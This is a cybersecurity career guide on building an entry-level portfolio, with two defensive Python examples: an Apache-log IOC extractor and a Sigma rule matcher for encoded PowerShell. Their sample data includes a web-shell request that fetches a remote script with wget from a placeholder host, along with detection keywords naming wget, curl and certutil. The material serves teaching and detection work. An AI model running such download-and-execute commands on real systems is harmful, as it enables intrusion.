Cybersecurity and Applied AI career insights
© 2023-2026 Bespoke Intermedia LLC
Founded by Julian Calvo, Ed.D., M.S.
Direct answer · last verified 2026-04
Build a cybersecurity portfolio with: (1) a home lab documented on GitHub (SIEM setup, firewall configuration, vulnerable VMs), (2) CTF competition writeups showing your methodology, (3) a security automation script in Python (log parser, IOC checker, vulnerability scanner wrapper), (4) a blog explaining cybersecurity concepts or analyzing real incidents, and (5) a detection rule set (Sigma rules mapped to MITRE ATT&CK). Practical artifacts outweigh certifications when competing for entry-level roles.
A cybersecurity portfolio is the single highest-signal differentiator for entry-level candidates per LinkedIn 2024 Talent Insights and several published intern-hiring manager interviews. Certifications prove you can pass an exam; the portfolio proves you can do the work. Hiring managers reviewing 200 to 400 entry-level resumes per posting filter on demonstrated artifacts (GitHub repos, published writeups, public CTF rankings) far more reliably than on certification count alone. Five project categories carry the most weight: home lab documentation, CTF writeups, security automation scripts, technical writing on real incidents, and detection content mapped to MITRE ATT&CK.
Home lab documentation. Set up a virtual network with VirtualBox or VMware Workstation Player on commodity hardware; a laptop with 16GB of RAM or a $400 used SFF PC handles it. Run a SIEM (Wazuh is free and production-quality, Splunk Free is capped at 500 MB of ingest per day but is well-known, and Elastic Security's free tier works), a pfSense or OPNsense firewall, Windows 10 or 11 evaluation VMs, Ubuntu Server, and one deliberately vulnerable target (DVWA, OWASP Juice Shop, Metasploitable 3, or a prebuilt Hack The Box box). Keep the vulnerable target on an internal or host-only network segment behind the lab firewall, never bridged to your home LAN, and snapshot every VM before each attack scenario so you can rerun it cleanly. Document the network topology, configuration choices, the rationale for each detection rule you enabled, and 3 to 5 simulated attack scenarios with screenshots and the matching SIEM alerts. Publish on GitHub with a clear README. This single artifact often closes interviews because it demonstrates you can build, operate, and analyze the same tooling SOC analysts work with daily.
CTF writeups. Compete on TryHackMe (free and paid tiers; the SOC Level 1 path is the standard entry path), Hack The Box (Academy plus machines), CyberDefenders (blue-team focused, with free challenges), or Blue Team Labs Online. Write detailed writeups for 5 to 15 challenges explaining your methodology, the tools you used, your failed attempts (these matter; they show real thinking), and lessons learned. Check each platform's publishing rules first: Hack The Box, for example, only permits public writeups for retired machines, and publishing one for an active box violates its terms of service. Publish on GitHub Pages or a personal blog at a custom domain. Hiring managers read writeups specifically, and well-written ones close interviews. A top 5 percent rank on any major platform plus 5 published writeups frequently produces direct recruiter outreach.
Security automation scripts. Write 3 to 5 Python scripts that automate real security tasks. Example projects: a VirusTotal API wrapper that takes a list of IPs or file hashes and produces a reputation report, a parser that extracts indicators of compromise (IOCs) from Apache or Windows event logs and maps them to MITRE ATT&CK techniques, an OSINT tool that gathers WHOIS, DNS, and certificate transparency data on a domain, a Sigma-rule-to-Splunk-search translator, or a CSV-to-STIX 2.1 converter. Push the code to GitHub with a clear README, a requirements.txt, type hints, and pytest unit tests. Read API keys from environment variables rather than hardcoding them, and check your commit history before the first push; a leaked VirusTotal key in a public repo is the first thing a reviewer will notice. Code quality matters; sloppy scripts hurt rather than help, and reviewers spot copy-pasted ChatGPT output quickly.
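The log-parser project from the list above, as an added example written for this page (it is not code from the page or from any named project): it pulls external IPs, domains, URLs, and file hashes out of Apache combined-format access lines, drops RFC 1918 and other internal ranges, defangs everything for a report, and attaches heuristic ATT&CK technique hints. The log lines are constructed; the 203.0.113.0/24 and 198.51.100.0/24 addresses are RFC 5737 documentation ranges standing in for real external hosts, and the keyword-to-technique table is this example's own choice rather than an authoritative mapping.

```python
"""Extract IOCs from Apache combined-format access logs and defang them for a report.

Added example for this page, not code from the page or from any named project.
The log lines below are constructed; 203.0.113.0/24 and 198.51.100.0/24 are RFC 5737
documentation ranges standing in for real external addresses.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2025:10:15:32 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.42 - - [12/Mar/2025:10:16:01 +0000] "GET /shell.php?cmd=wget%20http://198.51.100.7/x.sh HTTP/1.1" 200 44 "-" "curl/7.88.1"
203.0.113.42 - - [12/Mar/2025:10:16:05 +0000] "POST /upload HTTP/1.1" 200 10 "http://evil-updates.example/drop" "python-requests/2.31"
192.168.1.20 - - [12/Mar/2025:10:17:00 +0000] "GET /logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2025:10:18:13 +0000] "GET /?h=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1" 404 0 "-" "-"
"""

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
SHA256_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{64}(?![0-9a-fA-F])")
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")

# Ranges that never make useful external indicators. Production code can simply test
# ipaddress.ip_address(x).is_global, but that would also drop the RFC 5737 sample ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "224.0.0.0/4", "255.255.255.255/32")]

# Keyword hints for ATT&CK Enterprise techniques. The technique IDs are real; the keyword
# lists are this example's own heuristic, not an authoritative mapping.
ATTACK_HINTS = {
    "T1105 Ingress Tool Transfer": ("wget ", "curl ", "certutil"),
    "T1059 Command and Scripting Interpreter": ("cmd=", "exec=", "/bin/sh"),
}


def is_external_ip(text):
    """True for a syntactically valid IP address that lies outside INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def defang(ioc):
    """Neutralise an indicator so it is not clickable in a report (hxxp://, [.] for dots)."""
    if ioc.startswith(("http://", "https://")):
        netloc = urlsplit(ioc).netloc
        return "hxxp" + ioc[4:].replace(netloc, netloc.replace(".", "[.]"), 1)
    return ioc.replace(".", "[.]")


def extract_iocs(log_text):
    """Return sorted IOC lists by type plus ATT&CK hints for a block of log lines."""
    found = defaultdict(set)
    hints = set()
    for raw in log_text.splitlines():
        line = unquote(raw)  # injected commands usually arrive percent-encoded in the query
        for url in URL_RE.findall(line):
            found["url"].add(url)
            host = urlsplit(url).hostname or ""
            if is_external_ip(host):
                found["ipv4"].add(host)
            elif host:
                found["domain"].add(host.lower())
        for ip in IPV4_RE.findall(line):
            if is_external_ip(ip):
                found["ipv4"].add(ip)
        for digest in SHA256_RE.findall(line):
            found["sha256"].add(digest.lower())
        for digest in MD5_RE.findall(line):
            found["md5"].add(digest.lower())
        lowered = line.lower()
        for technique, needles in ATTACK_HINTS.items():
            if any(needle in lowered for needle in needles):
                hints.add(technique)
    report = {kind: sorted(found[kind]) for kind in ("ipv4", "domain", "url", "sha256", "md5")}
    report["attack_hints"] = sorted(hints)
    return report


def format_report(iocs):
    """Render the IOC dictionary as defanged text, one indicator per line."""
    lines = [f"{kind:<7} {defang(value)}"
             for kind in ("ipv4", "domain", "url", "sha256", "md5") for value in iocs[kind]]
    lines += [f"attack  {hint}" for hint in iocs["attack_hints"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(extract_iocs(SAMPLE_LOG)))
```

The internal-range filter and the percent-decoding step are the two places a first version of this script usually goes wrong: without the filter the report is full of your own lab addresses, and without decoding the `wget http://...` payload hides inside `%20`. Wiring `extract_iocs` to the VirusTotal API for the resulting hashes and IPs is the natural next step for the wrapper project in the same list.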
Technical writing on real incidents and concepts. Write 5 to 10 posts on a personal blog or Medium. Strong topics: a detailed analysis of a recent CISA advisory or Known Exploited Vulnerabilities catalog entry with detection recommendations, a walkthrough of building detection for a specific MITRE ATT&CK technique (e.g., T1059.001, PowerShell), a comparative review of two SIEM platforms based on hands-on lab experience, a root-cause analysis of a published breach (Verizon DBIR case studies work well), or an explanation of a security concept you previously misunderstood (e.g., what TLS 1.3 0-RTT resumption actually changes versus TLS 1.2 session resumption, and why replay becomes a concern). Writing demonstrates both knowledge and the communication skills that senior cybersecurity roles require. Bad writing actively hurts your candidacy; have each post edited carefully before publishing.
Detection content mapped to MITRE ATT&CK. Publish a small detection-rule set on GitHub mapping at least 10 detections to specific MITRE ATT&CK Enterprise techniques. Use Sigma format (vendor-neutral), Splunk SPL, or KQL for Microsoft Sentinel. For each rule include: the technique ID and name, the data source required (for example, Sysmon Event ID 1 or Windows Security Event 4688 for process creation), the detection logic, expected false positives, and tuning recommendations. Test every rule in your lab against both a benign baseline and the attack it is meant to catch, and record the result in the README; a rule that has never fired is a guess, not a detection. The SigmaHQ organization on GitHub maintains the community rule repository and is an excellent reference for structure and naming. Detection engineering is one of the most in-demand SOC sub-disciplines; a public detection portfolio signals readiness for that role family directly.
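What a single entry in such a rule set looks like, and how to prove it fires, as an added example written for this page (not SigmaHQ code and not the pySigma library): a rule for T1059.001 in Sigma's structure, expressed as a Python dict so it runs without a YAML parser, a minimal matcher for the `contains`/`startswith`/`endswith` modifiers and the `and`/`or`/`not` condition, and four constructed Sysmon Event ID 1 style records covering a true positive, a benign PowerShell launch, a tuned-out management agent, and Office spawning an encoded pwsh. The rule text, the `mgmtagent.exe` filter, and the events are all this example's own.

```python
"""Evaluate a Sigma-structured detection rule against process-creation events.

Added example for this page; it is not SigmaHQ code and not the pySigma library. The rule
is written as a Python dict that mirrors the Sigma YAML layout so it runs without a YAML
parser, and the sample events are constructed Sysmon Event ID 1 style records.
"""
import ast

RULE = {
    "title": "Encoded PowerShell Command Line",
    "status": "experimental",
    "description": "powershell.exe or pwsh.exe launched with an encoded command, a common loader pattern",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["-enc ", "-encodedcommand", "-ec "],
        },
        # Tuning filter for a hypothetical management agent that legitimately uses -EncodedCommand.
        "filter_mgmt_agent": {"ParentImage|endswith": "\\mgmtagent.exe"},
        "condition": "selection and not filter_mgmt_agent",
    },
    "falsepositives": ["Administrative tooling that passes -EncodedCommand; add its parent to the filter"],
    "level": "medium",
    "tags": ["attack.execution", "attack.t1059.001"],
}

SAMPLE_EVENTS = [  # constructed; "SQBFAFgAIAA=" is just a short base64 placeholder
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAA=",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand SQBFAFgAIAA=",
     "ParentImage": "C:\\Program Files\\MgmtAgent\\mgmtagent.exe"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -ec SQBFAFgAIAA=",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
]


def _match_value(actual, modifier, pattern):
    """Apply one Sigma value modifier. Sigma string matching is case-insensitive by
    default; wildcard handling is omitted to keep the example short."""
    actual, pattern = str(actual).lower(), str(pattern).lower()
    if modifier == "":
        return actual == pattern
    if modifier == "contains":
        return pattern in actual
    if modifier == "startswith":
        return actual.startswith(pattern)
    if modifier == "endswith":
        return actual.endswith(pattern)
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_block(block, event):
    """Fields inside a selection are ANDed; a list of values for one field is ORed."""
    for key, patterns in block.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        candidates = patterns if isinstance(patterns, list) else [patterns]
        if not any(_match_value(event[field], modifier, p) for p in candidates):
            return False
    return True


def _eval_condition(node, results):
    """Evaluate the and/or/not condition over block results without using eval()."""
    if isinstance(node, ast.Expression):
        return _eval_condition(node.body, results)
    if isinstance(node, ast.BoolOp):
        values = [_eval_condition(v, results) for v in node.values]
        return all(values) if isinstance(node.op, ast.And) else any(values)
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
        return not _eval_condition(node.operand, results)
    if isinstance(node, ast.Name):
        return results[node.id]
    raise ValueError("unsupported condition syntax")


def rule_matches(rule, event):
    """True when the rule's condition holds for one event."""
    detection = rule["detection"]
    results = {name: _match_block(block, event)
               for name, block in detection.items() if name != "condition"}
    return _eval_condition(ast.parse(detection["condition"], mode="eval"), results)


def matching_events(rule, events):
    """Indexes of the events the rule fires on."""
    return [i for i, event in enumerate(events) if rule_matches(rule, event)]


def attack_techniques(rule):
    """Technique IDs from Sigma's attack.tXXXX tags, e.g. attack.t1059.001 -> T1059.001."""
    return [tag[7:].upper() for tag in rule.get("tags", [])
            if tag.startswith("attack.t") and tag[8:9].isdigit()]


if __name__ == "__main__":
    for i in matching_events(RULE, SAMPLE_EVENTS):
        print(RULE["title"], attack_techniques(RULE), SAMPLE_EVENTS[i]["CommandLine"])
```

The four events are exactly the test matrix the README for each rule should record: one hit, one benign miss, one hit suppressed by the tuning filter, and one hit that a second rule (Office spawning PowerShell) would also catch. Once the rule is a real YAML file, the same matcher can load it with PyYAML, and the SigmaHQ converters turn it into SPL or KQL for the SIEM in your lab.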
Project sequencing and time investment. Weeks 1-4: home lab setup with Wazuh, basic detection content, 1 documented attack scenario. Weeks 5-8: TryHackMe SOC Level 1 path completion plus 3 published writeups. Weeks 9-12: build 2 Python automation scripts and publish to GitHub with documentation. Weeks 13-16: write 5 technical blog posts. Weeks 17-20: publish 10 detection rules with documentation. Total time investment 200 to 300 hours over 5 months at 10 to 15 hours per week. This portfolio compresses the gap between certification holder and demonstrated practitioner.
Honest tradeoffs and pitfalls. Quality beats quantity: 5 well-documented projects beat 20 shallow ones. Public versus private: publish publicly so hiring managers can verify your work; they cannot click into private repos. Plagiarism: copying a TryHackMe walkthrough verbatim or republishing detection rules without attribution is easy to detect and disqualifies a candidate instantly. Sensitive data: never publish home lab configurations that contain real credentials, real customer data, or anything that could be read as unauthorized scanning of real systems; keep every scan and exploit confined to hosts you own or have written permission to test. Burnout: portfolio building is sustainable at 10 to 15 hours per week; trying to compress it into 40 hours per week for 2 months produces shallow work that hurts your candidacy. DecipherU's career guides include specific portfolio project recommendations for SOC, GRC, AppSec, cloud security, and cybersecurity sales and pre-sales tracks.